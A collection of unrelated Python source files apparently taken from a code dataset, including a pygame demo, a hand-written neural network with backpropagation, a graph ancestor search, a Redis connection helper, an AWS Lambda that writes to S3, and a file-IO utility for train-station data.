entry)\n file_list_inv = os.listdir(src_dir + '/raw/' + entry)\n file_list.sort()\n file_list_inv.sort(reverse=True)\n num_files = len(file_list)\n\n if not os.path.exists(src_dir + '/raw_zinv/' + entry):\n os.makedirs(src_dir + '/raw_zinv/' + entry)\n\n\n for i in range(num_files):\n name1 = file_list[i]\n name2 = file_list_inv[i]\n print('%s --> %s'%(name1, name2))\n\n src_name = src_dir + '/raw/' + entry + '/' + name1\n tgt_name = src_dir + '/raw_zinv/' + entry + '/' + 
name2\n\n print(src_name)\n print(tgt_name)\n\n copyfile(src_name, tgt_name)\n\n\n\n # for f in file_list:\n","sub_path":"dataset_manipulation/z_inversion.py","file_name":"z_inversion.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494151973","text":"import pygame\nfrom pygame.locals import *\nSCREEN=[800,600]\nscreen = pygame.display.set_mode(SCREEN,0,32)\nCOLOR = [255,255,255]\nscreen.fill(COLOR)\ndoraemon = pygame.image.load(\"resources/images/doraemon.jpg\")\nx,y = 120,90\nx_offset,y_offset = 0,0\nwhile True :\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\texit()\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_a:\n\t\t\t\tx_offset = -5\n\t\t\telif event.key == K_d:\n\t\t\t\tx_offset = +5\n\t\t\telif event.key == K_w:\n\t\t\t\ty_offset = -5\n\t\t\telif event.key == K_s:\n\t\t\t\ty_offset = +5\n\t\t\n\t\telif event.type == KEYUP:\n\t\t\tx_offset = 0\n\t\t\ty_offset = 0\n\t\tx+= x_offset\n\t\ty+= y_offset\n\t\tscreen.blit(doraemon,[x,y])\n\t\tpygame.display.flip()\n\n\n\n\n","sub_path":"key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"165405881","text":"'''\nCreated on 12.07.2015\n\n@author: Aaron Klein\n'''\nimport numpy as np\n\nfrom robo.task.base_task import BaseTask\n\n\nclass Bohachevsky(BaseTask):\n\n def __init__(self):\n X_lower = np.array([-100, -100])\n X_upper = np.array([100, 100])\n opt = np.array([[0, 0]])\n fopt = 0.0\n super(Bohachevsky, self).__init__(X_lower, X_upper, opt, fopt)\n\n def objective_function(self, x):\n y = 0.7 + x[:, 0] ** 2 + 2.0 * x[:, 1] ** 2\n y -= 0.3 * np.cos(3.0 * np.pi * x[:, 0])\n y -= 0.4 * np.cos(4.0 * np.pi * x[:, 1])\n return y[:, np.newaxis]\n\n def objective_function_test(self, x):\n return self.objective_function(x)\n","sub_path":"RoBO/build/lib.linux-x86_64-2.7/robo/task/synthetic_functions/bohachevsky.py","file_name":"bohachevsky.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340014683","text":"def isSevenRelated( num ):\n if num%7 == 0:\n return True\n\n while num != 0:\n if num%10 == 7:\n return True\n num //= 10\n return False\n\nif __name__ == \"__main__\":\n\n res = [0]\n for i in range(1,10**6+1):\n if isSevenRelated(i):\n res.append(res[i-1])\n else:\n res.append(res[i-1]+i*i)\n \n T = int(input())\n for t in range(T):\n print( res[int(input())] )\n \n","sub_path":"01/1082.py","file_name":"1082.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"388671809","text":"\nimport os\nimport sys\nimport time\nimport logging\nimport argparse\nimport pandas as pd\n\nstart = time.clock()\n\ndef pca_parser():\n parser = argparse.ArgumentParser('pca', description='Y-haplogroup tracker @ver-1.0 BY ChenHao')\n parser.add_argument('pca',\n help='Run to plot pca plot.')\n parser.add_argument('-i', '--input', required=True, type=str, nargs='+',\n help='input: Input hap or extra file.')\n parser.add_argument('-o', '--output', required=False, type=str, nargs=1, action='store',\n help='output: Output haplogroup file.')\n parser.add_argument('-m', '--mode', required=False, type=str, nargs=1, default=['smart'], choices=['rough', 'smart', 'accurate'],\n help='missing rate: Set missing rate to filter female 
samples, default is 0.4')\n parser.add_argument('-t', '--type', required=False, type=str, nargs=1, default='key', choices=['key', 'final'],\n help='notes: Set whether keep the haplogroup attatching (Notes), defualt not setting.')\n parser.add_argument('-f', '--filter', required=False, action='store_true',\n help='filter: filter samples without key mutation.')\n parser.add_argument('--info', required=True, type=str, nargs=1, action='store',\n help='input: Input info file.')\n parser.add_argument('--freq', required=False, action='store_true',\n help='pcaplot: Output a pca plot.')\n\n args = parser.parse_args()\n\n return args\n\ndef judge_pca_inputfile(input_info, work_path):\n pca_inputfile_extra = None\n if os.path.isfile(input_info[0]) and input_info[0].endswith('.hap'):\n print('\\n' + '-' * 80)\n pca_inputfile = input_info[0]\n filename = os.path.split(pca_inputfile)[1]\n elif os.path.isfile(work_path + input_info[0]) and input_info[0].endswith('.hap'):\n print('\\n' + '-' * 80)\n pca_inputfile = work_path + input_info[0]\n filename = os.path.split(pca_inputfile)[1]\n else:\n print('\\n' + '-' * 80)\n print('%s is not a correct hap file, please assure file format correct.' % input_info[0])\n print('-' * 80 + '\\n')\n sys.exit()\n pca_hap_df = pd.read_table(pca_inputfile, sep='\\t', header=0, encoding='utf-8')\n if len(input_info) == 2:\n if os.path.isfile(input_info[1]) and input_info[1].endswith('.extra'):\n pca_inputfile_extra = input_info[1]\n elif os.path.isfile(work_path + input_info[1]) and input_info[1].endswith('.extra'):\n pca_inputfile_extra = work_path + input_info[1]\n else:\n print('%s is not a correct extra file, please assure file format correct.' % input_info[0])\n elif len(input_info) > 2:\n print('Please input no more than 2 file.')\n return pca_hap_df, pca_inputfile, pca_inputfile_extra, filename\n\ndef set_outputfile(output_file, work_path):\n if os.path.exists(os.path.split(output_file)[0]):\n if not output_file.endswith('.png'):\n output_file = output_file + '.png'\n return output_file\n elif os.path.split(output_file)[0] == '':\n output_file = work_path + output_file\n if not output_file.endswith('.png'):\n output_file = output_file + '.png'\n return output_file\n else:\n print('%s is not a correct path, please check it again.' 
% output_file)\n print('-' * 80 + '\\n')\n sys.exit()\n return output_file\n\ndef set_log(input_file, filename, args_log):\n logger = logging.getLogger()\n logger.setLevel(level=logging.INFO)\n\n handler = logging.FileHandler(input_file + '.log', mode='w')\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('[%(asctime)s] - [%(levelname)s]: %(message)s')\n handler.setFormatter(formatter)\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n\n logger.addHandler(handler)\n logger.addHandler(console)\n\n log_info = ['Run Date: ' + time.asctime(time.localtime(time.time())),\n 'Filename: %s' % filename,\n 'Classifying mode: %s' % args_log.mode[0],\n 'Haplogroup type: %s' % args_log.type,\n 'Keep samples without key mutation.']\n\n if args_log.filter:\n log_info[4] = 'Filter samples without key mutation.'\n if args_log.freq:\n log_info.append('Output frequency data.')\n\n for i in log_info:\n logger.info(i)\n\ndef judge_info_file(info_file, work_path):\n if isinstance(info_file, list):\n info_file = info_file[0]\n if os.path.isfile(info_file) and info_file.endswith('.info'):\n population_file = info_file\n elif os.path.isfile(work_path + info_file) and info_file.endswith('.info'):\n population_file = info_file\n else:\n print('%s is not a correct population file, please assure file format correct.' % info_file)\n print('-' * 80 + '\\n')\n sys.exit()\n\n return population_file\n","sub_path":"PcaFileIO.py","file_name":"PcaFileIO.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75528659","text":"\"\"\"\nReferences:\n https://medium.com/datathings/neural-networks-and-backpropagation-explained-in-a-simple-way-f540a3611f5e\n https://towardsdatascience.com/how-to-build-your-own-neural-network-from-scratch-in-python-68998a08e4f6\n\n\"\"\"\nimport numpy as np\nnp.random.seed(100)\nLOCAL = False\n\n# Activation function\ndef sigmoid(t):\n return 1 / (1 + np.exp(-t))\n\n\n# Derivative of sigmoid\ndef sigmoid_derivative(p):\n return p * (1 - p)\n\n\n# Class definition\nclass NeuralNetwork:\n def __init__(self, xTrains, yTrains, num_hidden_layer=2, num_nodes=10,\n step_size=0.05,\n momentum=0):\n self.input = np.array(xTrains) # should be flattened!\n self.y = np.array(yTrains)\n self.num_hidden_layer = num_hidden_layer\n self.num_nodes = num_nodes\n self.step_size = step_size #0.05\n self.output = np.zeros(self.y.shape)\n self.weights = []\n self.get_initial_weights()\n self.outputs = []\n self.momentum = momentum\n\n def get_initial_weights(self):\n\n for i in range(self.num_hidden_layer):\n\n if i == 0:\n num_features = len(self.input[0])\n w_dim = (num_features, self.num_nodes)\n else:\n w_dim = (self.num_nodes, self.num_nodes)\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n w_dim = (self.num_nodes, 1) # output layer has one node\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n if not len(self.weights) == (self.num_hidden_layer + 1):\n raise AssertionError(\"Weights doesn't match number of layers.\")\n\n def train(self, previous_delta_ws=[]):\n\n def get_prev_delta_w(si, wi):\n\n if not previous_delta_ws:\n return None\n return previous_delta_ws[si][wi]\n\n current_delta_ws = []\n for si, sample in enumerate(self.input):\n input = sample\n outputs = []\n for weights in self.weights:\n output = 
sigmoid(np.dot(input, weights))\n outputs.append(output)\n input = output\n\n # calculate error term, delta\n output_error = None\n current_delta_w = [None] * len(self.weights)\n for i in reversed(range(len(outputs))):\n if i == 0:\n input = self.input[si]\n else:\n input = outputs[i - 1]\n\n if output_error is None:\n\n output_error = sigmoid_derivative(output) * (self.y[si] - output)\n delta = np.array([input]) * output_error\n delta_w = self.step_size * delta\n self.weights[i] += delta_w.T\n current_delta_w[i] = delta_w.T\n\n else:\n error = np.dot(output_error, self.weights[i + 1].T)\n delta = sigmoid_derivative(outputs[i]) * error # (T4.4)\n # delta_w = self.step_size * np.array([[x] for x in input]) * np.array([delta])\n output_error = delta\n\n delta_w = self.step_size * delta * np.array([[x] for x in input])\n self.weights[i] += delta_w\n current_delta_w[i] = delta_w\n\n prev_delta_w = get_prev_delta_w(si, i)\n if prev_delta_w is not None:\n #print(self.weights[i].shape, prev_delta_w.shape)\n self.weights[i] += self.momentum * prev_delta_w\n current_delta_ws.append(current_delta_w)\n\n return current_delta_ws\n\n def predict(self, samples=None):\n\n if samples is None:\n samples = self.input\n predictions = []\n for sample in samples:\n input = sample\n for weights in self.weights:\n output = sigmoid(np.dot(input, weights))\n input = output\n predictions.append(output)\n return predictions\n\n def loss(self, xTests=None):\n if xTests is None:\n xTests = self.input # calculate loss with yTest\n s = np.sum(np.square(np.array(self.predict(xTests)) - np.array(xTests)))\n return 1 / 2. * s\n #return np.mean(np.square(yTests - self.feedforward()))\n\n# Class definition\nclass NeuralNetwork2:\n def __init__(self, xTrains, yTrains, num_hidden_layer=2, num_nodes=10,\n step_size=0.05):\n self.input = np.array(xTrains) # should be flattened!\n self.y = np.array(yTrains)\n self.num_hidden_layer = num_hidden_layer\n self.num_nodes = num_nodes\n self.step_size = step_size #0.05\n self.output = np.zeros(self.y.shape)\n self.weights = []\n self.get_initial_weights()\n self.outputs = []\n\n def get_initial_weights(self):\n\n for i in range(self.num_hidden_layer):\n\n if i == 0:\n num_features = len(self.input[0])\n w_dim = (num_features, self.num_nodes)\n else:\n w_dim = (self.num_nodes, self.num_nodes)\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n w_dim = (self.num_nodes, 1) # output layer has one node\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n if not len(self.weights) == (self.num_hidden_layer + 1):\n raise AssertionError(\"Weights doesn't match number of layers.\")\n\n def feedforward(self):\n\n # I tried at lest:(\n # predicted = []\n # for si, sample in enumerate(self.input):\n # input = sample\n # outputs = []\n # for weights in self.weights:\n # output = sigmoid(np.dot(input, weights))\n # outputs.append(output)\n # input = output\n #\n # predicted.append(output)\n # # calculate error term, delta\n # output_error = None\n # for i in reversed(range(len(outputs))):\n # if i == 0:\n # input = self.input[si]\n # else:\n # input = outputs[i - 1]\n #\n # if output_error is None:\n #\n # output_error = sigmoid_derivative(output) * (self.y[si] - output)\n # delta = input * output_error\n # delta_w = self.step_size * delta\n # self.weights[i] += np.array([[d] for d in delta_w])\n #\n # else:\n # error = np.dot(output_error, 
self.weights[i + 1].T)\n # delta = sigmoid_derivative(outputs[i]) * error # (T4.4)\n # delta_w = self.step_size * np.array([[x] for x in input]) * np.array([delta])\n # output_error = delta\n #\n # self.weights[i] += delta_w\n #\n # return np.array(predicted)\n\n # original\n self.outputs = [self.input] # initial output from input layer\n outputs = None\n for i, weights_in_layer in enumerate(self.weights):\n if i == 0:\n outputs = sigmoid(np.dot(self.input, weights_in_layer))\n else:\n outputs = sigmoid(np.dot(outputs, weights_in_layer))\n self.outputs.append(outputs)\n return self.outputs[-1]\n\n def loss(self, yTests=None):\n if yTests is None:\n yTests = self.y # calculate loss with yTest\n s = np.sum(np.square(np.array(self.feedforward()) - np.array(yTests)))\n return 1 / 2. * s\n #return np.mean(np.square(yTests - self.feedforward()))\n\n def backward(self):\n # backward propgate through the network\n # self.o_error = y - o # error in output\n # self.o_delta = self.o_error * self.sigmoidPrime(o) # applying derivative of sigmoid to error\n #\n # self.z2_error = self.o_delta.dot(self.W2.T) # z2 error: how much our hidden layer weights contributed to output error\n # self.z2_delta = self.z2_error * self.sigmoidPrime(self.z2) # applying derivative of sigmoid to z2 error\n #\n # self.W1 += X.T.dot(self.z2_delta) # adjusting first set (input --> hidden) weights\n # self.W2 += self.z2.T.dot(self.o_delta) # adjusting second set (hidden --> output) weights\n\n ## my version - no iteration\n # o_delta = sigmoid_derivative(self.output) * (self.y - self.output)\n #\n # z2_error = np.dot(o_delta, self.weights[1].T)\n # z2_delta = z2_error * sigmoid_derivative(self.outputs[1])\n #\n # delta_w1 = np.dot(self.input.T, z2_delta)\n # delta_w2 = np.dot(self.outputs[1].T, o_delta)\n #\n # self.weights[0] += delta_w1\n # self.weights[1] += delta_w2\n\n # with iteration\n output_errors = None\n for i in reversed(range(len(self.outputs) - 1)):\n if i == 0:\n input = self.input\n else:\n input = self.outputs[i]\n\n if output_errors is None:\n output = self.outputs[-1]\n output_errors = sigmoid_derivative(output) * (self.y - output)\n delta_w = self.step_size * np.dot(input.T, output_errors)\n self.weights[i] += delta_w\n else:\n error = np.dot(output_errors, self.weights[i + 1].T)\n delta = sigmoid_derivative(self.outputs[i + 1]) * error # (T4.4)\n delta_w = self.step_size * np.dot(input.T, delta)\n self.weights[i] += delta_w\n output_errors = delta\n\n def backprop(self):\n\n delta_weights = []\n # delta_k = o_k(1 - o_k)(t_k - o_k)\n # error_terms = None\n # for i in reversed(range(len(self.outputs))):\n # if i == 0:\n # break\n # op = self.outputs[i]\n # ws = self.weights[i - 1]\n # if error_terms is None:\n # error_terms = sigmoid_derivative(op) * (self.y - op)\n # all_deltas = (self.step_size * self.input * error_terms)\n # delta_weights = np.array([[x] for x in np.sum(all_deltas, axis=1)])\n # else:\n # error_terms = sigmoid_derivative(op) * np.dot(ws.T, error_terms)\n # delta_weights = self.step_size * self.input * error_terms\n # self.weights[i - 1] += delta_weights\n\n delta_weights = []\n # delta_k = o_k(1 - o_k)(t_k - o_k)\n propagated_errors = sigmoid_derivative(self.output) * (self.y - self.output)\n for i in reversed(range(len(self.outputs))):\n if i == 0:\n break\n prev_layer_outputs = self.outputs[i - 1]\n d_weights = self.step_size * np.dot(prev_layer_outputs.T, propagated_errors)\n # error_terms = self.step_size * sigmoid_derivative(prev_layer_outputs)*np.dot(self.weights[i-1].T, 
propagated_errors)\n # d_weights = error_terms * self.input.T\n delta_weights.insert(0, d_weights)\n propagated_errors = np.dot(propagated_errors, self.weights[i - 1].T) * sigmoid_derivative(prev_layer_outputs)\n\n for i, dw in enumerate(delta_weights):\n self.weights[i] += dw\n\n ########################################################################\n # dummy case when node 2 and 1 hidden layer.\n # self.layer1, self.layer2 = self.outputs[1], self.outputs[2]\n # self.weights1, self.weights2 = self.weights\n #\n # error_terms_on_output_layer = 2 * (self.y - self.output) * sigmoid_derivative(self.output)\n # d_weights2 = np.dot(self.layer1.T, error_terms_on_output_layer) # np.dot(output from L1.T, error_terms_by_L1)\n # d_weights1 = np.dot(self.input.T,\n # np.dot(error_terms_on_output_layer, self.weights2.T) * sigmoid_derivative(self.layer1))\n # # np.dot(\n #\n # self.weights[0] += d_weights1\n # self.weights[1] += d_weights2\n\n def train(self, X, y):\n self.output = self.feedforward()\n self.backward()\n #self.backprop()\n\n\nif __name__ == \"__main__\":\n # Each row is a training example, each column is a feature [X1, X2, X3]\n X = np.array(([0, 0, 1], [0, 1, 1], [1, 0, 1], [1, 1, 1]), dtype=float)\n y = np.array(([0], [1], [1], [0]), dtype=float)\n\n LOCAL = True\n NN = NeuralNetwork(X, y, num_hidden_layer=1, num_nodes=4, step_size=1)\n # for i in range(3000): # trains the NN 1,000 times\n # if i % 100 == 0:\n # # print(\"for iteration # \" + str(i) + \"\\n\")\n # # print(\"Input : \\n\" + str(X))\n # predictions = NN.predict()\n # print(\"Actual Output: \\n\" + str(y))\n # print(\"Predicted Output: \\n\" + str(predictions))\n #\n # print(\"Loss: \\n\" + str(np.mean(np.square(y - predictions)))) # mean sum squared loss\n # print(\"My Loss: \\n\" + str(NN.loss()))\n # # print(\"\\n\")\n #\n # NN.train()\n\n NN = NeuralNetwork2(X, y, num_hidden_layer=1, num_nodes=4, step_size=1)\n for i in range(3000): # trains the NN 1,000 times\n if i % 100 == 0:\n print(\"for iteration # \" + str(i) + \"\\n\")\n print(\"Input : \\n\" + str(X))\n print(\"Actual Output: \\n\" + str(y))\n print(\"Predicted Output: \\n\" + str(NN.feedforward()))\n print(\"Loss: \\n\" + str(np.mean(np.square(y - NN.feedforward())))) # mean sum squared loss\n print(\"My Loss: \\n\" + str(NN.loss()))\n print(\"\\n\")\n\n NN.train(X, y)\n LOCAL = False\n\n #####\n from collections import OrderedDict\n import numpy as np\n import os\n\n from Assignment6.Code import kDataPath\n from utils.Assignment5Support import LoadRawData, TrainTestSplit, Featurize\n (xRaw, yRaw) = LoadRawData(kDataPath, includeLeftEye=True, includeRightEye=True)\n (xTrainRaw, yTrainRaw, xTestRaw, yTestRaw) = TrainTestSplit(xRaw, yRaw, percentTest=.25)\n\n (xTrains, xTests) = Featurize(xTrainRaw, xTestRaw,\n includeGradients=False,\n includeRawPixels=False,\n includeIntensities=True)\n xTrains = np.array([[1] + x for x in xTrains])\n xTests = np.array([[1] + x for x in xTests])\n yTrains = np.array([[y] for y in yTrainRaw])\n yTests = np.array([[y] for y in yTestRaw])\n\n\n\n NN = NeuralNetwork2(xTrains, yTrains, num_hidden_layer=2, num_nodes=4, step_size=0.05)\n for i in range(200): # trains the NN 1,000 times\n if i % 10 == 0:\n print(\"for iteration # \" + str(i) + \"\\n\")\n #print(\"Actual Output: \\n\" + str(y))\n #print(\"Predicted Output: \\n\" + str(NN.feedforward())) # mean sum squared loss\n #print(\"My Loss: \\n\" + str(NN.loss()))\n predictions = NN.feedforward()\n print(\"Loss: \" + str(np.mean(np.square(yTrains - predictions))))\n 
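The hand-rolled backward passes above are easy to get subtly wrong, and a finite-difference comparison is the usual diagnostic. Below is a generic sketch on a tiny illustrative one-layer model; it reuses the same sigmoid convention but none of the classes above, and all numbers are made up for the demo.

import numpy as np

def sigmoid(t):
    return 1 / (1 + np.exp(-t))

# Tiny illustrative model: loss = 0.5 * sum((sigmoid(x . W) - y)^2)
x = np.array([[0.5, -0.2]])
y = np.array([[1.0]])
W = np.array([[0.1], [0.3]])

def loss(W):
    return 0.5 * np.sum((sigmoid(x.dot(W)) - y) ** 2)

# Analytic gradient of the loss via the chain rule:
# dL/dW = x^T . ((o - y) * o * (1 - o))
# (the code above folds the descent sign into its (t - o) delta instead)
o = sigmoid(x.dot(W))
analytic = x.T.dot((o - y) * o * (1 - o))

# Numerical gradient by central differences, one weight at a time.
eps = 1e-6
numeric = np.zeros_like(W)
for i in range(W.shape[0]):
    for j in range(W.shape[1]):
        Wp = W.copy(); Wp[i, j] += eps
        Wm = W.copy(); Wm[i, j] -= eps
        numeric[i, j] = (loss(Wp) - loss(Wm)) / (2 * eps)

print(np.max(np.abs(analytic - numeric)))  # should be negligible, ~1e-10

If the equivalent check against the deltas computed in train()/backward() does not come out near zero, a sign or a transpose in the weight update is usually the culprit.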
#print(\"\\n\")\n\n    NN.train(xTrains, yTrains)","sub_path":"Assignment8/Code/model/NeuralNetworkModel.py","file_name":"NeuralNetworkModel.py","file_ext":"py","file_size_in_byte":15338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"323355691","text":"############################################################\n\nfrom itertools import chain\n\nfrom tools.iter_tools import reduce\n\nfrom projects.graph.graph import Graph\n\n############################################################\n\nDEFAULT__DEBUG = False\nDEFAULT__DEFAULT = -1 # ...because that's what the spec wants\n\n\ndef dict_item__max(a, b):\n\n    key_a, value_a = a\n    key_b, value_b = b\n\n    if value_a is None:\n        return b\n\n    if value_b is None:\n        return a\n\n    if value_a >= value_b:\n        return a\n\n    else:\n        return b\n\n\ndef earliest_ancestor(\n    ancestor_edges,\n    from_node,\n    default=DEFAULT__DEFAULT,\n    debug=DEFAULT__DEBUG,\n):\n\n    # Define `ancestors` graph from `ancestor_edges`...\n    ancestors = Graph()\n\n    # Define nodes:\n    ancestor_nodes = set(chain.from_iterable(ancestor_edges))\n    for node in ancestor_nodes:\n        ancestors.add_node(node)\n\n    # Define edges:\n    for parent, child in ancestor_edges:\n        # child -> parent\n        ancestors.add_edge(child, parent)\n\n    if debug:\n        print(\"--- ancestors ---\")\n        print(ancestors.get_map())\n\n    #===========================================================\n    # OBVIOUS APPROACH\n    #-----------------------------------------------------------\n    # - Search from `from_node` to every other node\n    # - Pick the longest path\n    #-----------------------------------------------------------\n\n    other_nodes = ancestors.get_nodes().difference({from_node})\n\n    if debug:\n        print(\"--- other nodes ---\")\n        print(other_nodes)\n\n    ancestor_paths = {\n        to_node: ancestors.bfs(from_node, to_node, on_visit=None)\n        for to_node in other_nodes\n    }\n\n    if debug:\n        print(\"--- ancestor paths ---\")\n        print(ancestor_paths)\n\n    ancestor_distances = {\n        to_node: len(path) if path else None\n        for to_node, path in ancestor_paths.items()\n    }\n\n    if debug:\n        print(\"--- ancestor distances ---\")\n        print(ancestor_distances)\n\n    longest_path = reduce(dict_item__max, ancestor_distances.items())\n\n    if debug:\n        print(\"--- longest path ---\")\n        print(longest_path)\n\n    if longest_path[1] is None:\n        earliest_node = default\n    else:\n        earliest_node = longest_path[0]\n\n    return earliest_node\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"234369333","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/env python\r\n\r\nimport redis\r\nfrom config import REDIS_HOST, REDIS_PORT\r\n\r\nUSER_PREFIX = \"user:\"\r\nSESSION_PREFIX = \"session:\"\r\nBOOK_PREFIX = \"book:\"\r\nORDER_PREFIX = \"order:\"\r\n\r\n# Redis connection\r\npool = redis.ConnectionPool(host=REDIS_HOST, port=REDIS_PORT, db=0)\r\nr = redis.Redis(connection_pool=pool)\r\n\r\n","sub_path":"design-13331010-better/bookstore/utils/redis_conn.py","file_name":"redis_conn.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
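A short usage sketch for the redis_conn module above, assuming a reachable Redis server; the host, port, and stored value here are placeholders rather than the project's real config values.

import redis

# Mirrors the module above: one ConnectionPool, one shared client.
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
r = redis.Redis(connection_pool=pool)

# Keys follow the module's prefix convention, e.g. USER_PREFIX + a user id.
r.set('user:42', 'alice')
print(r.get('user:42'))  # b'alice'

Routing every caller through the one module-level pool keeps connection counts bounded, which is the point of defining pool and r once at import time.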
+{"seq_id":"356964068","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nSend the amazon_stock_price info to me. No SNS is set up here; instead, writing a file to S3 simulates the notification.\n\"\"\"\n\nimport boto3\nfrom datetime import datetime\n\n\ndef lambda_handler(event, context):\n    price = event[\"amazon_stock_price\"]\n    bucket_name = \"eqtest-sanhe\"\n    utcnow = datetime.utcnow()\n    key = \"{}.txt\".format(utcnow.strftime(\"%Y-%m-%d-%H-%M-%S\"))\n    body = \"amazon price on %s is %s\" % (utcnow, price)\n\n    s3 = boto3.client(\"s3\")\n    s3.put_object(Bucket=bucket_name, Key=key, Body=body.encode(\"utf-8\"))\n    return {\"message\": body}\n","sub_path":"docs/source/01-AWS/01-Compute/07-Step-Function-Root/example1-basic-choice/func_notify_me.py","file_name":"func_notify_me.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"151767059","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 16 22:23:11 2016\n\n@author: xzk\n\"\"\"\n\nclass Solution(object):\n    def searchRange(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        ileft, iright = 0, len(nums)-1\n        while True:\n            center = (ileft + iright) / 2\n            if nums[ileft] > target or nums[iright] < target:\n                return [-1, -1]\n            if nums[center] == target:\n                break\n            elif nums[center] > target:\n                iright = center\n            else:\n                ileft = center\n            if iright == ileft + 1:\n                if nums[ileft] == target:\n                    center = ileft\n                else:\n                    center = iright\n                break\n        \n        if nums[center] != target:\n            return [-1, -1]\n        ans = [ileft, iright]\n        for i in xrange(center, iright+1):\n            if nums[i] != target:\n                ans[1] = i - 1\n                break\n        for i in xrange(ileft, center+1):\n            if nums[i] == target:\n                ans[0] = i\n                break\n        return ans\n    \n    def searchRange2(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        if nums == []:\n            return [-1,-1]\n        ileft, iright = 0, len(nums)-1\n        if nums[ileft] > target or nums[iright] < target:\n            return [-1, -1]\n        target -= 0.5\n        idx1, idx2 = -1, -1\n        while True:\n            center = (ileft + iright) / 2\n            if nums[ileft] > target:\n                idx1 = ileft \n                break\n            if nums[center] >= target:\n                iright = center\n            elif nums[center] <= target:\n                ileft = center\n            if iright == ileft + 1:\n                if nums[iright] >= target and nums[ileft] <= target:\n                    idx1 = iright\n                break\n        target += 1\n        ileft, iright = 0, len(nums)-1\n        while True:\n            center = (ileft + iright) / 2\n            if nums[iright] < target:\n                idx2 = iright\n                break\n            if nums[center] >= target:\n                iright = center\n            elif nums[center] <= target:\n                ileft = center\n            if iright == ileft + 1:\n                if nums[iright] >= target and nums[ileft] <= target:\n                    idx2 = ileft\n                break\n        if idx1 > idx2:\n            return [-1, -1]\n        return [idx1, idx2]","sub_path":"34Search for a Range.py","file_name":"34Search for a Range.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
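The two binary-search variants above can be cross-checked against the standard library: bisect_left and bisect_right return exactly the boundaries this problem asks for. This is an alternative formulation for checking results, not the author's code.

from bisect import bisect_left, bisect_right

def search_range(nums, target):
    # First index >= target and first index > target bracket the run.
    lo = bisect_left(nums, target)
    hi = bisect_right(nums, target)
    if lo == hi:  # target absent
        return [-1, -1]
    return [lo, hi - 1]

print(search_range([5, 7, 7, 8, 8, 10], 8))  # [3, 4]
print(search_range([5, 7, 7, 8, 8, 10], 6))  # [-1, -1]

The target -= 0.5 / target += 1 trick in searchRange2 is doing the same thing by hand: searching for the half-integer just below and just above the target.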
+{"seq_id":"145221611","text":"__author__ = 'Freek, Zafer, Angelo'\n__build__ = \"versie 3.0\"\n\nfrom iNStagram.api_requests.app_requests import haal_stationgegevens_op\nimport os\n\nbestandnaam_stations=\"../file_io/stations.txt\" # relative to the file .../file_io/. <- you are here\n\ndef sla_stationsgegevens_op(alleen_als_niet_bestaat=False):\n    \"\"\"\n    Saves the station data to a file\n    :param alleen_als_niet_bestaat: makes sure data is only saved if the file does not exist yet\n    :type alleen_als_niet_bestaat: bool\n    :param bestandnaam: name of the file the stations are saved to\n    :return:\n    \"\"\"\n    if alleen_als_niet_bestaat and os.path.exists(bestandnaam_stations):\n        print(\"bestond al\")\n        return\n    stationsgegevens = haal_stationgegevens_op()\n    print(\"Stations opslaan...\")\n    with open(bestandnaam_stations,\"w\") as stations_bestand:\n        for station in stationsgegevens:\n            stations_bestand.write(str(station)+\"\\n\")\n    # with open closes the file (bestand.close()) when the block ends\n\ndef lees_stationgegevens():\n    \"\"\"\n    Reads the station data from the (locally) saved file; this helps because you do not have to connect to the NS API every time\n    :return: list of dicts with the name and location of each station\n    :rtype: list\n    \"\"\"\n    from ast import literal_eval\n    stations = []\n    print(\"Stations lezen...\")\n    with open(bestandnaam_stations,\"r\") as stations_bestand:\n        for regel in stations_bestand.readlines():\n            station_dict = literal_eval(regel)\n            stations.append(station_dict)\n\n\n    return stations\n\nif __name__ == '__main__':\n    sla_stationsgegevens_op(True)\n    